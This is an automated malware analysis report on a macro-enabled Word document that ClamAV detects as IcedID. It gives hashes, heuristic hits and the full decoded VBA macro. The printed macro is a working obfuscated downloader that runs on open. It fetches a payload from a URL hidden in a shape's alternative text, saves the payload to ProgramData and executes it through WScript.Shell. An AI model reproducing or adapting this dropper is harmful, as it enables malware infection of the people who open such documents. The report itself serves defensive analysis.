Office (OOXML) malware analysis — malicious · 8bd979b84ba395b8

MALICIOUS

Office (OOXML)

97.5 KB Created: 2020-10-13 10:42:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: 72a3d3276d9c5ebfcbc8a02a5ea73bec SHA-1: 291575951a19b9dff64c1f9d513a1b28714e743f SHA-256: 8bd979b84ba395b8fb05f02c4628d5f70758fd7dbe3ee8ddd9f06e7aa040b934

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set KSCsE = CreateObject("Script" + zEcGg)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11743 bytes
SHA-256: `9b14d3e7a0a2cfbe7321b0e83aa0de08192e8063dc1b170cf68575fbe17b614e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UCgPC" Sub xWHOS(JReeH, Optional ByVal ZCbaX As String = "c:\programdata\xJGCG.txt", Optional ByVal zEcGg As String = "ing.FileSystemObject") ' Fulfilled ' Outgrowing waterfalls haste ' Delegated rubbers ' Perigee comet survive ' Syllabuses tenurial puzzles ' Passives vertebra neurologists compensator ' Suffused higgledypiggledy heckle garbs tectonically ' Emanating ' Surpass poisonings hardpressed precincts ' Marmosets inhabits ' Singly intelligently warehousing schnapps ' Cannibalised snooping denominators combated codling ' Destinies ' Meld sones servers stifling ' Soapbox priory neatening Set KSCsE = CreateObject("Script" + zEcGg) ' Cellophane ruminate ' Except ulsters hydroelectric radiologists decidable ' Abdicates oozy extruded respired ' Hairpiece macabre pursued presupposed handful ' Fractures mamba ' Profaneness unencrypted overseen consumptive grandmas dissidents jukeboxes Set ghtCA = KSCsE.CreateTextFile(ZCbaX) ' Phototypesetter radiograph ' Static detached sedating ' Ruder odd chuckled sickening ' Murkier underperformed variance unclenched miscounted ' Boy tantalise ghtCA.WriteLine JReeH ' Animating instrumented perverseness soundless ' Weaning troupe indecent spearheaded ' Determinism parenthetic ' Headrest deploying covetous ' Forecasts gudgeon subtler silences ' Girded scheming herbicides ghtCA.Close ' Interdepartmental photon gradients warmish bathhouse foxhunting ' Grittier homophobic tonsils booty conceptions reducible implying ' Shunter distaff rescinding psychedelia ' Antelope grapnel rubberstamped staid belie ' Ridiculed ' Involves deadpan draughtsman confront ' Reap lotus quintet touchingly ' Sunburns ' Gordian pleases adumbrate blemished ' Internationalised ' Toadstools curer inseparable esau tables ' Agriculturally ' Tercentenary shorter ' Bribed looney ' Confuses monophonic conservation usable ' Squeaky conferring survivable mudflats reproach financier ' Throws voteless ' Dustman adjacent australian ' Footrest ' Shellfire straits ' Starter skulked poorest ' Money modulates laid bowman seams ' Groped hissings ' Trombones pentathlete convolution minings ' Crimp programmers basted unheated disjointed ' Hers walkabouts mediation perfidiously ' Mazurka ' Ironies spindry redhanded ' Chaser bridal kindles ' Bookmaker ' Analyst connote pinching ' Credible silently hint croatia grunted selfdiscipline exceeds affect ' Meritorious hexed stir unconcern noggin ' Salivation shades ' Unwedge spruced synchronises scabbed centric encrypting ' Softspoken blight chores slumbers ' Modifies oscillations End Sub ' Dazing fizzes carcasses euphemistically transferral ' Porcupine ' Felony hamitic ' Tendered vituperation rector boldest ' Beaver Sub AutoOpen() ' Occident drunkenness recommissioning gerontologist ' Halftruths politest ' Poach purveyor underbody ' Nondrinkers exhorting ' Untenable twines ' Instigation ' Burgle transgression ' Railroad swat garbed publicist ' Terminator treasuries ferrying ' Thankful importunately boomerangs ' Ailerons geocentric ' Suits hayfever ' Gyrated journal organised mismatches heist biz ' Shoes marine dyspeptic porcupines ' Afield repatriated raring ' Siberia flemish ' Osteopaths palpitated aggressiveness balm crackdowns ' Topiary collaborated ' Mom degradation lisping reputation ' Tradesman custodial impression brackets ' Refund circulars deconstructive timepiece ' Entrails sicily rioters importunity recycled ' Palmed ' Lubricant bumpy hollows ' Blinds craved intoned fluidised teethes negatives sarge ' Incantatory gentility cysteine ' Nudeness footnotes systematisation ' Kept decelerated outplay spilled cheeking ' Tobago staffs groundwork guardroom scandals Dim PqAHh As New njGZm ' Cypher constructor synchronic ' Egregious bitters fatalism festival ' Squandering wended outset ' Berated snore dictatorships ' Drills torah crisped equated ' Dishwashers lockage gluey promontories JReeH = PqAHh.JnbRr("MSXML2.serverXMLHTTP") ' Animosities ' Archetype cursor sensible curs sightseers ' Unload busiest unwrap ' Grasp suntanned ' Quartets liberally xWHOS ZfFJa(JReeH) ' Inhibitions skimming subjectivity vaccines ' Babbled desire ' Grannies submersible friendlier cloaked diluent ' Cramp shoddy greyed ' Tile fakery accruing henchman insinuation commotion ' Clocking reflexology ' Alleviation nationalist lightened ' Starlight supplementary UiQiN hTTUU(0) + "vr32 c:\programdata\xJGCG.txt", "ws" End Sub Function vaCEk(JUqyL, LXjIC) ' Drooling accreditation ' Propaganda float burning irascibility proposer ' Aperies computing softens consultant transcendentals ' Fretsaw chacha docker albania mangler ' Irresolvable sieved blacks molecule ' Instigators parcel destroyer ' Clever misting hearties vaCEk = Split(JUqyL, LXjIC) End Function Attribute VB_Name = "HYRQB" ' Northernmost chloroforming ' Crested solidifying cased transcribe misapply ' Dandy reaping straddle spittoon ' Expense lyric ' Kampala denims ' Incomprehension cataloguers inspired complexion cloying ' Mappers parametrise Function ZfFJa(nOyVT) ' Whacked artificiality chronicling misinform ' Saxony ' Deducting crooners glossed ' Also villainous ' Patched novelle ZfFJa = StrConv(nOyVT, vbUnicode) ' Mimosa breathes unwearied pandemics ' Acquiesced referendums lashes ' Halting permutes digestible cons nabbed ' Neatest counteroffensive wether dissent cringes ' Undemanding hobbit toehold ' Accidence subsection instabilities library End Function ' Tomorrow clavicle joyfully ' Sententiously ' Unconsecrated dishonest ' Purdah eel ' Phrenologically scripture Function LCOFb() ' Dogma irrelevant interdepartmental ' Becoming deluged machine baggier ' Goalscoring ' Baptism preparing ' Scrambling formality ' Resolvent airiest ' Apprehended commending ' Translational dives paralytic postilions ' Financier eloquent slimmers ' Vortex overhauled arrives ' Transit interdict continent scissor torchbearer ' Vigilantes fatted unreasonable With ActiveDocument.shapes(1) LCOFb = .AlternativeText End With End Function ' Tokenistic ' Twenties ' Stashing origami monocled wooly heeded ' Faithfully potency anthropoid ' Puffballs concatenations ' Kiosks coup winners electrode Function hTTUU(dFaye) ' Stalemate citing untypically ' Restricting ' Annulled ' Ascendant scripts outlying glycerol ' Starship moccasins topiary ' Tractors acapulco wretches ' Varieties blesbok vigorously nineteen workman devilish destabilisation ' Disassociate heaths ' Constraint ninny propinquity ' Deface ' Seashores latencies exhibitioner ambassadorial YuTgc = LCOFb() pNdKN = vaCEk(YuTgc, "###") jAIZu = pNdKN(dFaye) hTTUU = jAIZu End Function Attribute VB_Name = "njGZm" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Officerships whipcord interstitially ' Thirteenth suburbia joseph rebuilds ' Poetic insulates ' Discrediting lambs Function JnbRr(zKqAj) ' Filling diehards faded salacious secreting ' Heroine streak deputes stowage ' Clockwork influences hooters ' Bureaucracy publicity architectural localisation reprovingly ' Cardboard colonialist immunologist ' Paternalistic trumpeted sweetly acclimatised ' Susceptibilities unbothered Dim tlaFD As Object ' Bowling excels lexicography rated ' Spindry monks advance active ' Haystack who photoelectrically organelles ' Plotter nonentity communicants ' Superb blood unbending ' Shortage holocaust orthographic soared ' Surfed impacted arduous chamberlains ' Respectability bigamous flanges ' Perversion misdemeanours Set tlaFD = CreateObject(zKqAj) ' Unadapted satirist ' Litigation jeopardised insubordinate defected regular ' Filming ' Prawns ' Niches seats troikas ' Whiled prongs approves ' Norms colluding ' Stoma faster attend equiangular ' Closeup skydive schwas grog ceaseless ' Niagara sloppily unreadable tickled nation salami ' Gerund sliced incestuous chancellorship elliptic ' Crowbars ' Unintended subtle ' Struggled laughing ' Heavies conjugating rabidly ' Dais ' Protruded frontages ' Clasped exegetical expounded hymnbook ' Snide slag unappealing skittish ' Pulsing sweden ' Hurrahs pervert weeds supplement snubs XrIGO = hTTUU(1) ' Delible adventurous normalised ' Lustful supersonically herrings reheat maudlin ' Deacons platen crowd cramps public ' Sterilisations ingenuousness promiscuous ' Elapse tlaFD.Open "GET", Reverse(XrIGO), False ' Deflowering plunges dollar touchandgo insidious ' Frieze legislation freshening assumption ' Bash constructors scribes numerologists ' Compulsory church snowball tlaFD.Send ' Rearranged ' Handshake adaptor overwrote embroiling wreath ' Rafters chamberlains cairn ' Inkwells flexed methanol diagnostic ' Easterners weakness handover dreamers loamy ' Greatgranddaughter linguistics crosscheck honshu JnbRr = tlaFD.responsebody End Function Attribute VB_Name = "FROCO" Sub UiQiN(QiJYY, ACIqa) ' Truthfully sirloin rejuvenation panthers ' Receptions marathons probably inner reimbursed ' Flammability ' Soberer seeded film ' Spotting ' Bleeping tensor Set muZEh = CreateObject(ACIqa + "cript.shell") ' Astrophysics sunless orates spawn treader stripping ' Continuing wales bawdier tarry wended clubfooted carcinogens ' Midfielders attachments ' Rationalism arrears appeases spicery uprate ' Vernal ' Atoms walkover speech humanness marcher ritualistically ' Arsonist healing guarding tunic shrews ' Pilgrimage unsuitably indulge cambodia ' Farrow ole ' Rile quayside prevails missing ' Rapids delinquency ' Musings pursuit ' Grasslands vicarages artisan variational ' Prided reel sidestep ' Cowriter ' Pyrotechnic ' Allusion quainter ' Turpentine occupier sensor balm ' Projective onesided ' Nosier flue swazi infringed ' Itinerary fuelled finding truism ' Crest retract ' Handcart jotted skilfully breeziest ' Grand samplings hadrons lifeguards undo ' Euphoniums untalented hurlyburly threatening venerates ' Placement solemn ' Achievement arraying ' Protege ' Sombre straddling scuttles ' Edibility chairmen choicest siestas diaspora subsides ' Trimmers resistively parcels bodies ' Ceaselessly syndicates levitation foragers persuading monstrously ' Phoner aswan belfries pore smokiness ' Hattricks blatantly unluckiest brainy blondes ' Stormier ' Bestseller yoke grittier ' Downing tutoring magnate ' Rubberstamped goof decays lease reshapes ' Papa clitoral wariest silliness declensions ' Rollcall resonant notepaper depressions trident ' Seminary hollies ' Aptitudes unverifiable ultrasound refurbished ' Respiration dyslexically ' Terraform seance salivas flutter muZEh.exec QiJYY ' Reusable remission ' Oddjob exoderm counterattacked ' Mangles ' Caesar underwritten frumpy rasher ' Leaky deteriorating remarkable dissipate ' Whiter strictness sweetmeat End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	44032 bytes
SHA-256: `21aa2815f31139c815aa6c8e60c422186554a975f61f7995fa1b2ad267e7c5b0`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.